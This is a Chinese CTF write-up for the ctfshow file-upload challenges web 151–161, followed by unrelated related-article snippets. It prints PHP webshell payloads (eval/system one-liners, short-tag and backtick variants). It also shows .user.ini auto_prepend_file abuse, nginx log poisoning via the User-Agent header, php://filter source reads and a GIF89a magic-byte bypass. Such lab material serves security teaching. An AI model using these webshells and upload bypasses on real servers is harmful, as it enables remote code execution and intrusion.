ctfshow——文件上传

文章目录

  • 文件上传思路
  • web 151
  • web 152
  • web 153
    • 知识点
    • 解题
  • web 154
  • web 155
  • web 156
  • web 157
  • web 158
  • web 159
  • web160
  • web 161

文件上传思路

在这里插入图片描述
在这里插入图片描述

web 151

打开页面显示:前台校验不可靠。说明这题是前端验证。
在这里插入图片描述
右键查看源代码,找到与上传点有关的前端代码:
在这里插入图片描述
  这里使用了一个叫Layui的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。可见这里前端只允许上传图片类型的文件,且文件后缀名为png。

  绕过前端验证的最简单方法就是,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
在这里插入图片描述
在这里插入图片描述
可见,上传成功~,下一步就是写一个shell<?php @eval($_POST['cmd']);?>,用webshell连接工具蚁剑去连接上传的webshell。

这里我们详细分析一句话木马,不借助工具获取flag。

  1. php代码要写在<?php ?>中,php解析器才会认出这是php代码;
  2. @符号的意思是不报错,即使执行错误,也不报错;
  3. eval():把字符串当做PHP代码执行;
  4. $_POST['cmd']接收POST传参,传参的变量名叫cmd

    除了POST传参,还有GET传参$_GET['cmd']、全局的传参方法$_REQUEST['cmd'](不管是GET传参 or POST传参 or FIlE传参 or COOKIE传参)。

  5. php执行系统命令的函数有system()exec()shell_exec()、反撇号。php执行外部命令
    在这里插入图片描述

在这里插入图片描述

web 152

跟前一题一样的

web 153

知识点

  自PHP 5.3.0起,PHP支持基于每个目录的INI文件配置,此类文件仅被CGI/Fast SAPI处理。如果PHP以模块化的方式运行在Apache里,则.htaccess文件有同样效果。除了主php.ini之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。如果被执行的php文件在web根目录之外,则只扫描该目录。在这里插入图片描述

配置选项是有权限的。php.ini是主要的配置文件,.user.ini是用户自定义的配置文件且能覆盖php.ini的内容,php解析器在解析php文件时会扫描.user.ini的配置。

  在.user.ini风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。用人话说就是除了PHP_INI_SYSTEM模式的配置以外都可以在.user.ini中进行重写。两个重要的配置选项:

auto_append_file=filename     //相当于在每个php文件尾加上 include(“filename”)
auto_prepend_file=filename    //相当于文件头加上 include(“filename”)

  利用.user,ini的方法:保证三个文件(.user.inishell.pngxx.php)在同一目录下,再执行该目录下的php文件。例如:

	//.user.iniauto_prepend_file=1.png//1.png<?php phpinfo();?>//1.php(任意php文件)

三个文件在一个目录下,就相当于1.php文件开头插入了include('1.png');进行文件包含,因为1.png中有php代码,所以经过include之后会执行shell脚本。

解题

此题前后端都检测content-type值,只允许上传PNG文件。
在这里插入图片描述
上传.user.ini文件,内容为auto_prepend_file=shell.png在这里插入图片描述
上传shell.png文件
在这里插入图片描述
  从之前可以得知,upload文件夹下有一个index.php的文件,故访问../upload/index.php?cmd=phpinfo();,可以看到phpinfo的页面。

在这里插入图片描述

web 154

知识点:过滤<?php
绕过方法:使用短标签进行绕过(没有限制条件)。如:

<?php @eval($_GET['cmd']);?> == <=@eval($_GET['cmd']);>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

此题过滤了php这一关键词。使用短标签进行绕过。

pyload:

<?=@eval($_GET['cmd']);?>

在这里插入图片描述
在这里插入图片描述

web 155

同web 154

web 156

知识点:过滤php[]关键字
绕过方法:

  • php关键字被过滤,使用php短标签进行绕过;
  • []被过滤,使用{}进行替换。例如:
    <?php @eval($_GET['cmd']);?> ==  <?php @eval($_GET{cmd});?>
    

payload:

<?=system('cat ../fl*')?>

在这里插入图片描述

web 157

在前面的基础上,过滤了{;,而且文件内容不能有php字符串。
绕过方法:

  • 过滤;,则在短标签里,可以省略;。例如:
<?php @eval($_GET{cmd});?> == <?php @eval($_GET{cmd})?>
  • 过滤{,那就不用eval函数接受参数,再执行系统命令,直接用system()函数执行系统命令。如<?=system(ls)?>
    -cat ../flag.php==cat ../fl*

payload:

<?=system('cat ../fl*')?>

在这里插入图片描述

web 158

同web157

web 159

在前面的基础上,过滤了(。绕过方法:直接用反撇号执行系统命令,反撇号就相当于shell_exec()函数。payload:

<?=`cat ../fl*`?>

在这里插入图片描述

web160

在前面的基础上,过滤了反撇号。绕过方法:

  1. 第一种方法:利用日志包含绕过。就是说有些中间件会将用户访问记录记在日志里,如果将webshell写到日志里,再包含日志,不就可以getshell了吗?操作:

    • 同样先上传.user.ini文件,内容为auto_prepend_file=shell.png
      在这里插入图片描述

    • 上传shell.png文件,文件内容为<?=include"/var/lo"."g/nginx/access.lo"."g"?>(log关键词被过滤),且将shell写在UA头中。

    • ngnix的日志路径为/var/log/nginx/access.log
    • php中,可以用.进行字符串的拼接;

    在这里插入图片描述

    • 访问xxx/upload/index.php.
  2. 第二种方法:因为已经知道flag的位置,通过php伪协议进行文件读取。

    • 同样先上传.user.ini文件,内容为auto_prepend_file=shell.png
    • 上传shell.png,文件内容为<?=include"ph"."p://filter/covert.base64-encode/resource=../flag.ph"."p"?>
    • 访问xxx/upload/index.php,再使用base64进行解码即可。
      在这里插入图片描述
      在这里插入图片描述

web 161

这关在前面的基础上,还进行文件内容检测(主要是使用getimagesize()函数进行检测),服务端主要检测文件幻数。其实就是检测文件内容开始的地方,不同后缀名的文件,文件起始的地方是不一样的。

这关很恶心嗷,前端验证只能为png文件,后端检测文件内容必须是gif。

绕过方法:制作图片马,更简单的就是用burp抓包,将你的shell写在文件内容里。

  1. 先上传.user.ini文件,内容为auto_prepend_file=shell.png(需要加gif文件的文件幻数GIF89a);
    在这里插入图片描述
  2. 上传shell.png,文件内容为<?=include"ph"."p://filter/covert.base64-encode/resource=../flag.ph"."p"?>,同样要加文件幻数GIF89a。
    在这里插入图片描述
  3. 访问../upload/index.php,使用base64进行解码。
    在这里插入图片描述
    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/588098.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

软件测试/测试开发丨Linux进阶命令(curl、jq)

1、 curl 接口请求 curl是一个发起请求数据给服务器的工具curl支持的协议FTP、FTPS、HTTP、HTTPS、TFTP、SFTP、Gopher、SCP、Telnet、DICT、FILE、LDAP、LDAPS、IMAP、POP3、SMTP和RTSPcurl是一个非交互的工具 2、 curl 发起 get 请求 -G&#xff1a;使用get请求-d&#xf…

还不会STL???【C++】标准模板库(STL):万字长文,不看后悔,适合小白,快速上手,函数全盘点!

文章目录 STL 是什么01 vector 动态数组1.1介绍1.2方法函数1.3 访问1.3.1 下标访问1.3.2 迭代器访问1.3.3 智能指针 02 stack 栈2.1 介绍2.2 方法函数2.3 栈遍历2.3.1 栈遍历2.3.2 数组模拟栈进行遍历 03 queue 队列3.1 介绍3.2 方法函数3.3 队列模拟 04 deque 双端队列4.1 介绍…

电子邮件地址填写指南:格式与常见问题解答

一个专业的电子邮件地址是一个你只用于工作目的的通信帐户。当你给收件人发送电子邮件时&#xff0c;这是他们最先看到的细节之一。无论你的职位或行业如何&#xff0c;拥有一个专业的电子邮件地址都可以提高你和所在公司的可信度。 在本文中我们解释了专业的电子邮件地址是什么…

2023-12-22 LeetCode每日一题(得到山形数组的最少删除次数)

2023-12-22每日一题 一、题目编号 1671. 得到山形数组的最少删除次数二、题目链接 点击跳转到题目位置 三、题目描述 我们定义 arr 是 山形数组 当且仅当它满足&#xff1a; arr.length > 3存在某个下标 i &#xff08;从 0 开始&#xff09; 满足 0 < i < arr.…

HTTPS面试题

HTTPS面试题 什么是HTTPS&#xff1f;它与HTTP有何不同&#xff1f; 答案&#xff1a;HTTPS&#xff08;Hypertext Transfer Protocol Secure&#xff09;是一种通过加密和认证保护数据传输安全的HTTP协议。它使用SSL&#xff08;Secure Sockets Layer&#xff09;或TLS&#x…

Zookeeper-Zookeeper应用场景实战(二)

1. Zookeeper 分布式锁实战 1.1 什么是分布式锁 在单体的应用开发场景中涉及并发同步的时候&#xff0c;大家往往采用Synchronized&#xff08;同步&#xff09;或者其他同一个 JVM内Lock机制来解决多线程间的同步问题。在分布式集群工作的开发场景中&#xff0c;就需要 一种…

2024年【安全员-A证】考试内容及安全员-A证最新解析

题库来源&#xff1a;安全生产模拟考试一点通公众号小程序 安全员-A证考试内容参考答案及安全员-A证考试试题解析是安全生产模拟考试一点通题库老师及安全员-A证操作证已考过的学员汇总&#xff0c;相对有效帮助安全员-A证最新解析学员顺利通过考试。 1、【多选题】下列关于门…

配置yum镜像源

文章目录 前言一、配置yum源1.清除本地配置2.挂载镜像3.新增本地源配置4.加载本地yum源&测试 总结 前言 在内网环境的时候&#xff0c;yum无法正常连接互联网安装软件&#xff0c;这时候我们可以挂载系统镜像文件来下载。 一、配置yum源 1.清除本地配置 cp -rf /etc/yum…

2023年12月个人工作生活总结

本文为 2023 年 12 月工作生活总结。 研发编码 Sqlite3数据库已有表添加字段 需求&#xff1a;某工程因需要在数据库已有表添加一新字段&#xff0c;不影响原有结构。关键代码&#xff1a; 添加表名&#xff1a; ALTER TABLE <表名> ADD COLUMN <新字段> INTEGE…

DS|串应用

问题一&#xff1a;DS串应用 -- KMP算法 题目描述&#xff1a; 学习KMP算法&#xff0c;给出主串和模式串&#xff0c;求模式串在主串的位置 输入要求&#xff1a; 第一个输入t&#xff0c;表示有t个实例 第二行输入第1个实例的主串&#xff0c;第三行输入第1个实例的模式…

RHCE9学习指南 第13章 硬盘管理

新的硬盘首先需要对硬盘进行分区和格式化&#xff0c;首先了解一下硬盘的结构&#xff0c;如图13-1所示。 图13-1 磁盘上的磁道和扇区 硬盘的磁盘上有一个个的圈&#xff0c;每两个圈组成一个磁道。从中间往外发射线&#xff0c;把每个磁道分成一个个的扇区&#xff0c;每个扇…

Linux个人常用总结

1 文件操作 1.1 查看文件 ls ls -a&#xff1a;Linux上的文件以“.”开头的文件被系统视为隐藏文件&#xff0c;仅用ls命令是看不到他们的&#xff0c;而用ls -a除了显示 一般文件名外&#xff0c;连隐藏文件也会显示出来。ls -l&#xff1a;这个命令可以使用长格式显示文件内…

Python高级用法:生成器(generator)

生成器&#xff08;generator&#xff09; 生成器是一种返回生成序列的方法&#xff0c;与直接使用列表等方式返回序列的方式不同的是&#xff0c;他的生成可以是无限的。 生成器可以与next搭配使用&#xff0c;可以被看作是一种特殊的迭代器。 yield语句 yield一般与循环相…

机器学习的底层技术

机器学习的底层技术主要包括以下几个方面&#xff1a; 数学推导能力&#xff1a;机器学习依赖于数学理论和方法&#xff0c;例如线性代数、概率论、统计学等。数学推导能力可以帮助人们理解和推导机器学习算法的原理&#xff0c;进而应用于实际问题中。 数据结构和算法&#x…

vue的工作原理

获取内存中的(虚拟)dom树和新生成的(虚拟)dom树,通过diff算法进行对比,得到需要更新的DOM元素 这两颗(虚拟)DOM树都是框架模拟出来的,就是个对象,旧的会被保存在内存中 Vue.js 是一种用于构建用户界面的渐进式 JavaScript 框架。下面是 Vue.js 的工作原理概述&#xff1a; 声明…

“图解C语言:一维数组的声明、创建与初始化艺术“

各位少年&#xff1a; 标题&#xff1a;《C语言一维数组的探索之旅&#xff1a;从声明到初始化&#xff0c;及如何避免常见误区》 引言 在编程世界中&#xff0c;数组无疑是最基础且重要的数据结构之一&#xff0c;尤其在C语言中&#xff0c;它以其简洁明了的特性为各类数据处…

UDP套接字搭建简易服务器与客户端

使用UDP套接字搭建 文章目录 使用UDP套接字搭建前言一、基本结构二、使用步骤1.服务器端2.客户端 三、效果展示总结 前言 这次较上个版本《Python 网络编程之搭建简易服务器和客户端》https://only-me.blog.csdn.net/article/details/135251171增加了&#xff1a; UDP协议来进…

机器学习部分相关概念

数据集(Data Set)即数据的集合&#xff0c;每一条单独的数据被称为样本(Sample)。 对于每个样本&#xff0c;它通常具有一些属性(Attribute)或者特征(Feature)&#xff0c; 特征所具体取得值被称为特征值(Feature Value)。 西瓜数据集 色泽根蒂纹理青绿稍蜷模糊乌黑蜷缩清晰 …

Python编程-实现对自定义类对象排序

Python编程-实现对自定义类对象排序 具有不同标识的类的实例比较结果通常为不相等&#xff0c;除非类定义了 __eq__() 方法。 一个类的实例不能与相同类的其他实例或其他类型的对象进行排序&#xff0c;除非定义该类定义了足够多的方法&#xff0c;包括 __lt__(), __le__(), __…

学Python的正确顺序千万别弄反了,到时候后悔就来不及了

学Python的正确顺序&#xff1a;从基础到高级&#xff0c;步步为营 在当今数字化时代&#xff0c;Python已成为最受欢迎的编程语言之一。它不仅广泛应用于数据分析、人工智能和Web开发等领域&#xff0c;还为初学者提供了一个友好且功能强大的平台。然而&#xff0c;学习Python…